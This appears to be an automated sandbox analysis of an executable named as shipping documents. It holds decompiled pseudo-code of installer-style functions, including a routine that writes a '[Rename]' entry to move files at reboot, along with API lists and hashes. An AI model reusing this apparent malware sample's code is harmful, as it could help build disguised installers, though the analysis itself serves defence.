                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                          • String ID: PB
                                          • API String ID: 184305955-3196168531
                                          • Opcode ID: 7ca70d26d5cdbf7e385cb3433e5eec3c9b526a6c029d08fd08a86bcbe3389ad2
                                          • Instruction ID: 6f64ab7c90c2728ca861f65b52108cf4a96aadf8bbc29eaef7369c8c365bd3a4
                                          • Opcode Fuzzy Hash: 7ca70d26d5cdbf7e385cb3433e5eec3c9b526a6c029d08fd08a86bcbe3389ad2
                                          • Instruction Fuzzy Hash: F2C1C2B1A00300BFDB216F61EE45D2B3AB8EB85746F41053EF641B51F1CB3999829B5D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404417, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E00404417(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				signed int _t106;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L11:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x41fd1c =  *0x41fd1c + 1;
								__eflags =  *0x41fd1c;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00404313(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
								_t109 =  *((intOrPtr*)(_t110 + 0x18));
								_v12 = _t100;
								__eflags = _t100 - _t109 - 0x800;
								_v16 = _t109;
								_v8 = 0x4236e0;
								if(_t100 - _t109 < 0x800) {
									SendMessageA(_t52, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorA(0, 0x7f02));
									_push(1);
									_t40 =  &_v8; // 0x4236e0
									E004046BB(_a4,  *_t40);
									SetCursor(LoadCursorA(0, 0x7f00));
									_t110 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
							goto L26;
						} else {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
								goto L26;
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x424748, 0x111, 1, 0);
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x424748, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L25;
					}
					__eflags =  *0x41fd1c; // 0x0
					if(__eflags != 0) {
						goto L25;
					}
					_t112 =  *0x420528 + 0x14;
					__eflags =  *_t112 & 0x00000020;
					if(( *_t112 & 0x00000020) == 0) {
						goto L25;
					}
					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t106;
					 *_t112 = _t106;
					E004042CE(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E00404697();
					goto L11;
				} else {
					_t98 = _a16;
					_t113 =  *(_t98 + 0x30);
					if(_t113 < 0) {
						_t107 =  *0x423f1c; // 0x5bb880
						_t113 =  *(_t107 - 4 + _t113 * 4);
					}
					_push( *((intOrPtr*)(_t98 + 0x34)));
					_t114 = _t113 +  *0x424798;
					_push(0x22);
					_a16 =  *_t114;
					_v12 = _v12 & 0x00000000;
					_t115 = _t114 + 1;
					_v16 = _t115;
					_v8 = E004043E2;
					E004042AC(_a4);
					_push( *((intOrPtr*)(_t98 + 0x38)));
					_push(0x23);
					E004042AC(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
					E004042CE( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
					_t99 = GetDlgItem(_a4, 0x3e8);
					E004042E1(_t99);
					SendMessageA(_t99, 0x45b, 1, 0);
					_t86 =  *( *0x424754 + 0x68);
					if(_t86 < 0) {
						_t86 = GetSysColor( ~_t86);
					}
					SendMessageA(_t99, 0x443, 0, _t86);
					SendMessageA(_t99, 0x445, 0, 0x4010000);
					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
					 *0x41fd1c = 0;
					SendMessageA(_t99, 0x449, _a16,  &_v16);
					 *0x41fd1c = 0;
					return 0;
				}
			}



















                                          0x00404427
                                          0x00404539
                                          0x0040454c
                                          0x004045a8
                                          0x004045a8
                                          0x004045ac
                                          0x00404672
                                          0x00404679
                                          0x0040467b
                                          0x0040467b
                                          0x0040467b
                                          0x00404681
                                          0x00404681
                                          0x00404684
                                          0x00000000
                                          0x0040468b
                                          0x004045ba
                                          0x004045bc
                                          0x004045bf
                                          0x004045c6
                                          0x004045c8
                                          0x004045cf
                                          0x004045d1
                                          0x004045d4
                                          0x004045d7
                                          0x004045dc
                                          0x004045e2
                                          0x004045e5
                                          0x004045ec
                                          0x004045fa
                                          0x00404612
                                          0x00404614
                                          0x00404616
                                          0x0040461c
                                          0x0040462b
                                          0x0040462d
                                          0x0040462d
                                          0x004045ec
                                          0x004045cf
                                          0x00404630
                                          0x00404637
                                          0x00000000
                                          0x00404639
                                          0x00404639
                                          0x00404640
                                          0x00000000
                                          0x00000000
                                          0x00404642
                                          0x00404646
                                          0x00404657
                                          0x00404657
                                          0x00404659
                                          0x0040465d
                                          0x0040466b
                                          0x0040466b
                                          0x00000000
                                          0x0040466f
                                          0x00404637
                                          0x00404554
                                          0x00404557
                                          0x00000000
                                          0x00000000
                                          0x0040455f
                                          0x00404565
                                          0x00000000
                                          0x00000000
                                          0x00404571
                                          0x00404574
                                          0x00404577
                                          0x00000000
                                          0x00000000
                                          0x0040459a
                                          0x0040459a
                                          0x0040459c
                                          0x0040459e
                                          0x004045a3
                                          0x00000000
                                          0x0040442d
                                          0x0040442d
                                          0x00404430
                                          0x00404435
                                          0x00404437
                                          0x00404446
                                          0x00404446
                                          0x0040444d
                                          0x00404450
                                          0x00404452
                                          0x00404457
                                          0x00404460
                                          0x00404466
                                          0x00404472
                                          0x00404475
                                          0x0040447e
                                          0x00404483
                                          0x00404486
                                          0x0040448b
                                          0x004044a2
                                          0x004044a9
                                          0x004044bc
                                          0x004044bf
                                          0x004044d4
                                          0x004044db
                                          0x004044e0
                                          0x004044e5
                                          0x004044e5
                                          0x004044f4
                                          0x00404503
                                          0x00404515
                                          0x0040451a
                                          0x0040452a
                                          0x0040452c
                                          0x00000000
                                          0x00404532

                                          APIs
                                          • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004044A2
                                          • GetDlgItem.USER32 ref: 004044B6
                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004044D4
                                          • GetSysColor.USER32(?), ref: 004044E5
                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004044F4
                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404503
                                          • lstrlenA.KERNEL32(?), ref: 00404506
                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404515
                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040452A
                                          • GetDlgItem.USER32 ref: 0040458C
                                          • SendMessageA.USER32(00000000), ref: 0040458F
                                          • GetDlgItem.USER32 ref: 004045BA
                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004045FA
                                          • LoadCursorA.USER32 ref: 00404609
                                          • SetCursor.USER32(00000000), ref: 00404612
                                          • LoadCursorA.USER32 ref: 00404628
                                          • SetCursor.USER32(00000000), ref: 0040462B
                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404657
                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040466B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                          • String ID: N$6B
                                          • API String ID: 3103080414-649610290
                                          • Opcode ID: 92e91cd1affbd3efd92fc6b3bb7834c3f505693ecc67e2e18e8bcfcef82aadde
                                          • Instruction ID: 4db3d1b8578fb28e8129a2e139a0a5bbbdeef9899b51b491bef805f45c6f40d7
                                          • Opcode Fuzzy Hash: 92e91cd1affbd3efd92fc6b3bb7834c3f505693ecc67e2e18e8bcfcef82aadde
                                          • Instruction Fuzzy Hash: 5761B2B1A00209BFDB109F61DD45F6A3B69EB85310F11843AFB01BA2D1D7BD9952CF98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405E97, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 129memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00405E97(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x422ae0 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x422ee0
					_t12 = GetShortPathNameA( *_t2, 0x422ee0, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4226e0, "%s=%s\r\n", 0x422ae0, 0x422ee0);
						_t53 = _t52 + 0x10;
						E004062BB(_t37, 0x400, 0x422ee0, 0x422ee0,  *((intOrPtr*)( *0x424754 + 0x128)));
						_t12 = E00405DC1(0x422ee0, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405E39(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405D26(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405D26(_t38, _t21 + 0xa, 0x40a3f0);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405D7C(_t24 + _t46, 0x4226e0, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405E68(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405DC1(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x422ae0, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                          0x00405e97
                                          0x00405ea0
                                          0x00405ea7
                                          0x00405ebb
                                          0x00405ee3
                                          0x00405eea
                                          0x00405eee
                                          0x00405ef2
                                          0x00405f12
                                          0x00405f19
                                          0x00405f23
                                          0x00405f30
                                          0x00405f35
                                          0x00405f3a
                                          0x00405f3e
                                          0x00405f4d
                                          0x00405f4f
                                          0x00405f5c
                                          0x00405f60
                                          0x00405ffb
                                          0x00000000
                                          0x00405f76
                                          0x00405f83
                                          0x00405fa7
                                          0x00405fab
                                          0x00405fca
                                          0x00405fce
                                          0x00405fce
                                          0x00405fd0
                                          0x00405fd9
                                          0x00405fe4
                                          0x00405fef
                                          0x00405ff5
                                          0x00000000
                                          0x00405ff5
                                          0x00405fad
                                          0x00405fb0
                                          0x00405fbb
                                          0x00405fb7
                                          0x00405fb9
                                          0x00405fba
                                          0x00405fba
                                          0x00405fc2
                                          0x00405fc4
                                          0x00000000
                                          0x00405fc4
                                          0x00405f8e
                                          0x00405f94
                                          0x00000000
                                          0x00405f94
                                          0x00405f60
                                          0x00405f3e
                                          0x00405ebd
                                          0x00405ec8
                                          0x00405ed1
                                          0x00405ed5
                                          0x00000000
                                          0x00000000
                                          0x00405ed5
                                          0x00406006

                                          APIs
                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00406028,?,?), ref: 00405EC8
                                          • GetShortPathNameA.KERNEL32(?,00422AE0,00000400), ref: 00405ED1
                                            • Part of subcall function 00405D26: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D36
                                            • Part of subcall function 00405D26: lstrlenA.KERNEL32(00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D68
                                          • GetShortPathNameA.KERNEL32(?,00422EE0,00000400), ref: 00405EEE
                                          • wsprintfA.USER32 ref: 00405F0C
                                          • GetFileSize.KERNEL32(00000000,00000000,00422EE0,C0000000,00000004,00422EE0,?,?,?,?,?), ref: 00405F47
                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F56
                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F8E
                                          • SetFilePointer.KERNEL32(0040A3F0,00000000,00000000,00000000,00000000,004226E0,00000000,-0000000A,0040A3F0,00000000,[Rename],00000000,00000000,00000000), ref: 00405FE4
                                          • GlobalFree.KERNEL32 ref: 00405FF5
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405FFC
                                            • Part of subcall function 00405DC1: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\202139769574 Shipping Documents.exe,80000000,00000003), ref: 00405DC5
                                            • Part of subcall function 00405DC1: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405DE7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                          • String ID: %s=%s$[Rename]$*B$.B$.B
                                          • API String ID: 2171350718-3836630945
                                          • Opcode ID: e97eba996e681404a4fca208a0394d40b36fb18a7df9535e4eb70ec6e63efc10
                                          • Instruction ID: e10df20c38e6db669e3e204b33f1f32e55eddbf12f2a20f16207bac721f49ac6
                                          • Opcode Fuzzy Hash: e97eba996e681404a4fca208a0394d40b36fb18a7df9535e4eb70ec6e63efc10
                                          • Instruction Fuzzy Hash: EA310331200B167BD2206B659E4DF6B3A5CDF45758F14043BF942F62D2EE7CE8118AAD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x424754;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x423f40, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x424748;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                          0x0040100a
                                          0x00401039
                                          0x00401047
                                          0x0040104d
                                          0x00401051
                                          0x0040105b
                                          0x00401061
                                          0x00401064
                                          0x004010f3
                                          0x00401089
                                          0x0040108c
                                          0x004010a6
                                          0x004010bd
                                          0x004010cc
                                          0x004010cf
                                          0x004010d5
                                          0x004010d9
                                          0x004010e4
                                          0x004010ed
                                          0x004010ef
                                          0x004010ef
                                          0x00401100
                                          0x00401105
                                          0x0040110d
                                          0x00401110
                                          0x00401112
                                          0x00401118
                                          0x0040111f
                                          0x00401126
                                          0x00401130
                                          0x00401142
                                          0x00401156
                                          0x00401160
                                          0x00401165
                                          0x00401165
                                          0x00401110
                                          0x0040116e
                                          0x00000000
                                          0x00401178
                                          0x00401010
                                          0x00401013
                                          0x00401015
                                          0x0040101f
                                          0x0040101f
                                          0x00000000

                                          APIs
                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                          • BeginPaint.USER32(?,?), ref: 00401047
                                          • GetClientRect.USER32 ref: 0040105B
                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                          • FillRect.USER32 ref: 004010E4
                                          • DeleteObject.GDI32(?), ref: 004010ED
                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                          • DrawTextA.USER32(00000000,00423F40,000000FF,00000010,00000820), ref: 00401156
                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                          • DeleteObject.GDI32(?), ref: 00401165
                                          • EndPaint.USER32(?,?), ref: 0040116E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                          • String ID: F
                                          • API String ID: 941294808-1304234792
                                          • Opcode ID: 2115552123f79a9609963f7e9290141a6f0abd4dc8a6adc5f5d249a59f4964a3
                                          • Instruction ID: db002e3ba225c6bd58a8671fff368fb1669b339ad4166f4ebb51648b269c9ea2
                                          • Opcode Fuzzy Hash: 2115552123f79a9609963f7e9290141a6f0abd4dc8a6adc5f5d249a59f4964a3
                                          • Instruction Fuzzy Hash: 51419D71800249AFCF058FA5DE459AF7FB9FF45314F00802AF991AA1A0C738DA55DFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004062BB, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 199stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 72%
                                          			E004062BB(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x423f1c; // 0x5bb880
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x424798;
				_t39 = 0x4236e0;
				_t90 = 0x4236e0;
				if(_a4 >= 0x4236e0 && _a4 - 0x4236e0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E004062BB(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x4236e0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x425000;
							E00406228(_t90, (_t97 << 0xa) + 0x425000);
						} else {
							E00406186(_t90,  *0x424748);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E00406503(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42474c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x4247e4;
						if( *0x4247e4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x424744;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x424748,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x424748,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E0040610F((_t80 & 0x0000003f) +  *0x424798, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x424798, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E004062BB(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E00406228(_a4, _t39);
			}



























                                          0x004062bb
                                          0x004062bb
                                          0x004062bb
                                          0x004062c1
                                          0x004062c6
                                          0x004062c8
                                          0x004062d7
                                          0x004062d7
                                          0x004062df
                                          0x004062e0
                                          0x004062e1
                                          0x004062e2
                                          0x004062e5
                                          0x004062ed
                                          0x004062ef
                                          0x00406306
                                          0x00406309
                                          0x00406309
                                          0x004064e0
                                          0x004064e0
                                          0x004064e4
                                          0x00000000
                                          0x00000000
                                          0x00406316
                                          0x0040631c
                                          0x00000000
                                          0x00000000
                                          0x00406322
                                          0x00406323
                                          0x00406326
                                          0x00406329
                                          0x004064d3
                                          0x004064dd
                                          0x004064df
                                          0x004064df
                                          0x004064d5
                                          0x004064d7
                                          0x004064d9
                                          0x004064da
                                          0x004064da
                                          0x00000000
                                          0x004064d3
                                          0x0040632f
                                          0x00406333
                                          0x00406343
                                          0x0040634a
                                          0x0040634d
                                          0x00406355
                                          0x00406358
                                          0x0040635f
                                          0x00406360
                                          0x00406363
                                          0x00406480
                                          0x00406483
                                          0x004064b3
                                          0x004064b6
                                          0x004064bb
                                          0x004064bf
                                          0x004064bf
                                          0x004064c4
                                          0x004064ca
                                          0x004064cc
                                          0x00000000
                                          0x004064cc
                                          0x00406485
                                          0x00406488
                                          0x0040649d
                                          0x004064a4
                                          0x0040648a
                                          0x00406491
                                          0x00406491
                                          0x004064ac
                                          0x004064af
                                          0x00406478
                                          0x00406479
                                          0x00406479
                                          0x00000000
                                          0x004064af
                                          0x00406369
                                          0x00406370
                                          0x00406372
                                          0x00406373
                                          0x0040638d
                                          0x0040638d
                                          0x00406394
                                          0x00406394
                                          0x0040639b
                                          0x0040639f
                                          0x0040639f
                                          0x004063a0
                                          0x004063a2
                                          0x004063db
                                          0x004063de
                                          0x004063ee
                                          0x004063f1
